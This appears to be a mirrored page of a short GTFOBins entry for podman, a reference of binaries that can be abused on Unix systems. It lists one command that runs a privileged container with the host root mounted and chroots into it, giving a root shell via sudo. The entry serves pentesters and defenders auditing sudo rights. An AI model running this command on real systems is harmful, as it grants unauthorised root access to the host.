mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-27 22:10:48 +01:00
7 lines
165 B
Markdown
7 lines
165 B
Markdown
|
---
|
||
|
functions:
|
||
|
sudo:
|
||
|
- description: The resulting is a root shell.
|
||
|
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
|
||
|
---
|